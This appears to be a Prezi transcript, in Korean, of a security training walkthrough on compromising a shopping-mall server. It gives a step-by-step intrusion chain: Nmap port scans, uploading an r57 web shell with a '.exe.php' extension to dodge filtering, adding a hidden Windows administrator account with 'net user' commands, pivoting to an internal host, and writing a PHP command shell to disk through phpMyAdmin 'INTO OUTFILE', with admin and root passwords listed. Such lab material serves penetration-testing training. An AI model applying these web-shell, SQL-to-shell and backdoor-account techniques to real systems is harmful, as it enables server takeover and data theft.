Loading presentation...

Present Remotely

Send the link below via email or IM

Copy

Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in our knowledge base article

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.

DeleteCancel

Make your likes visible on Facebook?

Connect your Facebook account to Prezi and let your likes appear on your timeline.
You can change this under Settings & Account at any time.

No, thanks

쇼핑몰 대외비 탐색

No description
by

병조 임

on 23 September 2014

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of 쇼핑몰 대외비 탐색


시작
1. 포트 탐색
● 제공된 사이트 61.76.182.46의 열린포트를 Nmap을 이용하여 찾는다.
16. 접근 성공
● 쇼핑몰서버의 데스크탑 접근성공
취약점 탐색
쇼핑몰 대외비 탐색
* 열린포트 7373 발견
2. 사이트 접속
● 열린포트를 통해 61.76.182.46:7373 으로 접속한다.
* 열린포트로 접속
3. 파일업로드 공격 1
● 파일업로드 공격을 통해 해당 서버로 접속.
*업로드시킬 파일 이름
4. 파일업로드 공격 2
● 업로드시킨 웹쉘 파일을 웹상에서 실행시킨다.
*r57webshell 실행화면
5. 사용자 계정 추가
● 실행시킨 웹쉘로 서버에 원격접속을 위한 새로운 사용자 계정을 추가한다.
6. 서버 원격 접속
● 추가한 계정으로 원격 접속을 시도한다.
7. 쇼핑몰 IP 탐색
● 현재 서버가 사용중인 IP를 IP Scan 프로그램을 이용하여 찾는다.
8. 쇼핑몰 포트 탐색
● 찾은 쇼핑몰 IP로 접속하기위해 열린 포트를 Nmap을 이용하여찾는다
9. 쇼핑몰 접속
● 수집한 정보를 바탕으로 서버 내부에서 쇼핑몰사이트로 접속한다.
10. 관리자 계정 획득
● 명령어를 이용하여 관리자 계정을 획득한다.
11. 관리자 계정 접속
● 찾아낸 관리자 계정으로 접속한다.
12. phpmyadmin 접속(SQL)
● SQL 접근을 위해 phpmyadmin에 접속하여 SQL 명령창으로 들어간다.
● 필터링 우회를 위해 웹쉘의 확장자를 .exe.php로 변경한후 업로드 시킨다.
● 업로드된 파일은 짧은 주기로 삭제되므로 꾸준한 업로드가 필요하다.

● 사용자 계정 추가 명령어
- net user GSD /add
- net localgroup administrators GSD /add
- user GSD 1234
*원격 접속 성공
인증과정
* 사용중인 IP 발견
- 192.168.0.1
- 192.168.0.114(서버의 내부 IP)
- 192.168.0.126
* 쇼핑몰 IP - 192.168.0.126 발견
*기본포트가 아닌 열린포트
6969
발견
* 쇼핑몰 접속 포트임을 추측가능
*
접속 IP
: 192.168.0.126
*
접속 포트
: 6969
명령어
#내부구조를 알아야 사용가능
*찾아낸 관리자 계정

-
ID
: admin
-
PW
: test1324
접속
ID
: admin

접속
PW
: test1324
admin| test1324
*관리자페이지 접속화면
*접속
ID
: root

*접속
PW
: apmsetup
13. 쉘 생성
● SQL 쿼리 명령창을 통해 쉘을 생성한다.
14. 계정 추가
● 최상위 경로에 생성된 쉘을 사용하여 계정을 추가한다.
15. 원격 접속
● 생성시킨 계정을 통해 원격으로 접속한다.
*쉘삽입 명령어

- USE phpMyAdmin;
create table sea2shell(code text);
insert into sea2shell(code)value("<?
system($_REQUEST['cmd']);?>");
SELECT * into outfile "C:\\APM_Setup \\htdocs \\wizboard\ \sea2shell.php" from sea2shell;
-http://192.168.0.126:6969/wizboard/seashell.php?cmd=net user GSD /add
=> 계정생성
-http://192.168.0.126:6969/wizboard/seashell.php?cmd=net localgroup administrators GSD /add
=> 그룹추가
-http://192.168.0.126:6969/wizboard/seashell.php?cmd=net user GSD 1234
=> 비밀번호 설정
* 쉘 사용법
* 실행 성공시 출력화면
*접속
IP
: 192.168.0.126
*접속
ID
: GSD

*접속
PW
: 1234
출처 : i2sec
Full transcript